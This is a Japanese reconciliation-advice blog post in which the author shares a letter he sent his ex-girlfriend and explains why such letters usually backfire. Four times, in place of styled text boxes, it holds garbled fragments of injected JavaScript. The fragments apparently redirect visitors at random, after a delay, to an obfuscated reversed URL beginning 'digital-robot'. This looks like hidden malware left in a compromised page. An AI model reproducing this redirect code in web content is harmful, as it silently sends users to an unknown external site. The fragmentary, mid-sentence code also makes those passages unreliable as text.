復縁成功者が実際に元カノに送った手紙大公開※こんな手紙は送っちゃダメ

この記事は6分で読めます

復縁経験者が、実際に元カノに送った手紙を公開しています。

uibyこのページでは、自力復縁に成功した、当サイトの管理人

“復縁ドッグ”が、復縁相手でもあり、現在の妻でもある

“愛”に送った手紙を公開しているページです。

復縁希望者さんの何かのヒントになればと思い、思い切って公開することにしました。
|・ω・`)コッショリ

復縁実践者が、どんな手紙を書いているのか?

また、手紙を書くことは復縁にとって有効なのか?

このあたりも書いていますので、参考にしてください。
では、はじめます。

 

まず、早速手紙をご覧になってください。

Юヽ(-ω-*)おじゃまします

q02

q03

 

見づらかもしれませんので文字おこししておきます。

φ(.. ) メモメモ

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 10px; border: 3px solid #4d5aaf;”>

初手紙で~す。よくよく考えてみたら、復縁ドッグの字って

あまり見た事ないよね~。今は部屋が寒くなって、手がかじかんでます。

 

愛と別れて2ヶ月がたちました。まさか、本当に別れがくるなんて、

ちょっと前までは、想像すらできなかったよ。今思うと、1日1回の電話と、

1週間に1度遊んでた事が、どれほど幸せだったかが、身にしみます。

 

 

写真みたかなぁ~。もっと淋しくなるかな~と思ったら、

淋しさ半分、心が温かくなるの半分でした。写真を見てたらさ~、

つき合いたては、恥ずかしいとかいって、あまり撮らせてくれなかったよね~。

 

いつのまにか少しずつだけど、平気になったよねっ。

それからやたらピースが多い事にも気が付きました。

そんな愛が可愛いな~とか思ってしまった復縁ドッグです。

 

 

この中にいる2人は、まぎれもなく幸せな2人だと思うよっ。

前メールで、幸せってなんだろう?って入ってたけど、

答えはこの中にあるって感じです。

 

今でも信じている事が1つあります。

それは、がんばったら、がんばった分だけ、

何かいいことが起きるってことです。

 

だから、復縁ドッグは努力します。自分自身では、

もう本気でダメだって思うまでは勉強や、恋愛に全力で挑もうと思います。

正直、そうしてないと、心のバランスが上手く取れないような気がしてね。

 

 

復縁ドッグは心のバランスが取れている。って、前、愛に言われました。

でもそれは、愛のおかげだよって、言ったの思えているかな~?。

本当なんだよっ。愛がいるとがんばるぞ~って気に、自然となってくるんだよ。

 

そう言うと、愛はそんなことないよ、復縁ドッグが

すごいんだよっ、とか言いそうだけどねっ。とにかく大切な人だよ。

すご~~~~い大事です。

 

 

だから、2度と戻れないなんて言わないで。

写真見てよ、幸せそうでしょ。1つのことにこだわって、

大きな物が見えなくなっちゃダメだよ。

 

 

3年間も愛の事、見てきたんだから、+面、-面、復縁ドッグにはお見通しです。

今すぐとは言わないし、復縁ドッグも勉強しなきゃだから、時間はいくらでもあるよ。

やるべきことは、1人でやって、甘える時はとことん甘える。復縁ドッグは

そうやって生きてきたつもりです。

 

 

1人で全部がんばる必要もないし、それじゃ~相手が淋しすぎるでしょっ。

人間どこからでもやり直しがきくし、決めつけちゃうと 可能性が減っちゃうし、

何より楽しいのが一番です。

 

 

笑顔が一番!ゆっくりでいいから、一緒にハッピーになろうよ。

ハッピー、ハッピー、ハッピーライフ!ではまたね~。

 

PS

手紙が届いたら、10日以内に返さないとハゲます。

復縁ドッグ

 

 

この手紙は、愛が大事に取っておいてくれたものです。

今では、愛が宝物と言ってくれているこの手紙。

あなたは、どう感じましたでしょうか?

 

お恥ずかしながら、その当時、

こんな手紙を愛に送っていました。

(//∇//) テレテレ

 

 

今読み返してみても、何が言いたいのかが全く分かりません。

明るく書いたつもりだったのですが、ところどころ、

復縁に対する、粘っこい執念みたいなところが伺えますね。

こりゃ、ダメですね。( ゚д゚)ァラヤダ

ただ、重い印象を持たれておしまいです。

(○゚ε゚○)プッ!!

 

 

このような、復縁相手に手紙を書くこと自体、

果たして、復縁には有効なのでしょうか?

 

はじめに言っておきますが、手紙を送って良い人は、

以下のケースに、当てはまる人だと思ってください。

 

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 10px; border: 1px solid #460e44; background-color: #ffffef;”>

①別れ話をしている最中で、かつ、揉めていなく、自分の感謝の気持ちを、伝えときたい人。

 

②誤解による別れを迎えてしまったが、誤解を解く為に面と向かって会う機会があり、でも、冷静に話せない人。

 

もちろん、このケースでなくても手紙を出しても良いと思いますが、

この記事は、不特定多数の人が読むものですので、それぞれが、

それぞれ、恋愛経験、レベルが違うと思います。

 

それを加味して、このように設定しています。

 

正直、手紙は、手紙を出すタイミングや、今の元カレ、元カノとの関係、

新しい恋人の有無、手紙の内容などによっても、効果が大きく変わってしまいますので、

恋愛経験の浅い方や、感情が高ぶってしまっている方は、

安易に、手紙は送らない方が、無難なんですよね。

 

 

特に、別れ際で揉めてしまった方は、絶対、手紙を送ってはいけません。

 

 

なぜなら、別れ際で、しつこく復縁を迫ってしまった人は、

相手に嫌なイメージを植え付けてしまっています。

元カレ、元カノとしては、何度も、何度も、復縁を求められているので、

正直、うんざりしてしまっているのです。

 

そんな時に、あなたから想いがこもった手紙が届いたら、

元カレ、元カノは、どう思うでしょうか?

 

 

 

「こんなに自分のこと、想ってくれていたんだ!」

「嬉しいな!!復縁しちゃおうかな!!」

 

 

 

こんな風に、心変わりするでしょうか?

そうではないですよね。

 

普通に考えて、電話でもダメ、メールでもダメ、直接会ってもダメ、

だから、今度は、手紙で復縁を迫ったきた…。
そういった、マイナスの印象を与えてしまうでしょう。

これでは、元彼、元カノとしては、追い詰められている印象を持つだけなのです。

 

 

 

想いの詰まった手紙、特に、復縁ドッグのような、

愛情いっぱいの、直筆の手紙なんかを送ってしまっては、

元カレ、元カノは、また、あなたに復縁を迫られると、

警戒されるのがオチです。

 

そして、あなたに変に期待を持たせたくない、純粋に怖いなどの理由から、

連絡を取ろうとしなくなるでしょう。

 

 

冷静に考えてみれば分かりますが、

友達関係でも、メールや電話で、連絡を取る回数が、

少ない人に、いきなり、手紙なんて、出しませんよね。

 

貰った方としては、

 

「えっ、何これ????」

ヽ(#`Д´)ノこんなのいらん!

こんな具合に、警戒されることが分かるからです。

でも、私がそうであったように、復縁したい人は、手紙を出してしまう。

その気持ちはよ~く、分かりますが、復縁したい人は、

冷静ではないのです。

 

だから、復縁ドッグのように、手紙を送ろうとしてしまいます。

 

手紙は、普通に、連絡を取り合っている人達が、

普段は、面と向かって言えない気持ちを、

素直に表現するから、相手の心に響くんです。

フムフム(*゚Д゚)φ))ナルホド!!

 

 

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 10px; border: 1px dotted #460e44; background-color: #e7e7eb;”>

結婚式の、母への感謝の手紙などを考えてみたら、分かりやすいと思います。

あれをいきなり、連絡を取りたくない人にやられたら、怖いですよね。

 

残念ですが、元カノと連絡が取りづらい人は、

元カレ、元カノとの距離感は、昔とは違うのです。

付き合っていた当時に、愛情いっぱいの手紙を書いたら、

そりゃ、彼女、彼氏も喜びますよ。

 

でも、今はそうではない。

 

辛いですが、復縁を成就させるには、

この事実を、受け止めなくてはいけません。

ギャ━━━━━━Σヾ(゚Д゚)ノ━━━━━━ !!!!

これは、経験者の言葉として、受け止めて欲しいと思います。

今の心の距離を縮めていくことが、復縁作業なのです。

そのためには、万人にとって、手紙は有効な手段ではありません。

 

相手が、どう感じるかが、見て取れませんので

手紙を送る行為は、ギャンブルに近いと思ってもいいでしょう。

 

但し、恋愛経験が豊富で、恋愛レベルが高い人でしたら、

手紙も1つのコミュニケーション手段として、上手に使えると思いますので、

上手く活用していって下さい。

 

何でもそうですが、使うタイミング、使い方が大事なのです。

 

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 10px; border: 1px dotted #460e44; background-color: #e7e7eb;”>

お笑い芸人を見ていればわかると思いますが、同じ発言でも、

笑いにできる人、出来ない人がいますよね。

あれって、間の取り方、タイミング、前後の会話など、

様々な要素を加味して、発言しているんですよね。

 

手紙でも、同じことは言えます。

使い方によって、効果はバラバラなんです。

 

芸人で言えば、大爆笑も取れますし、どすべりになる場合だってあるのです。

失礼かもしれませんが、この記事を読んでいる方は、それほど、恋愛レベルが

高い人ではないと思います。

 

だからこそ、手紙は相手の顔が見えないツールですので、

安易に勧めていない訳です。

 

 

これが、実際に復縁の際に、手紙を送った体験と、

復縁について、日ごろから、考えまくっている、復縁ドッグの意見です。

このページがあなたの、復縁のお役に立てれば幸いです。

復縁ドッグ

この記事を読んでいる人は以下のカテゴリー記事も読んでいます。

1年2カ月復縁ドッグ復縁体験談
復縁ドッグスカイプセミナー
復縁ドッグによる復縁基礎講座
復縁活動中の方からの疑問を解決
おすすめ復縁マニュアル

  • このエントリーをはてなブックマークに追加

関連記事

コメント

  1. この記事へのコメントはありません。

  1. この記事へのトラックバックはありません。

管理人:復縁ドッグ


恋愛レベルの向上なしに復縁はできない!

恋愛レベルの向上なしに夫婦の絆は作れない!

をモットーに、当サイトは運営されています。


1年2ヵ月の歳月を費やし、

自力で復縁に成功した復縁ドッグは

現在、復縁した彼女と結婚し

幸せな家庭を築いています。



→復縁ドッグによる前10回復縁メール講座



→復縁ドッグの10年以上に渡る復縁日記



→復縁に欠かせない基礎知識


youtube動画一覧

復縁オンライン講座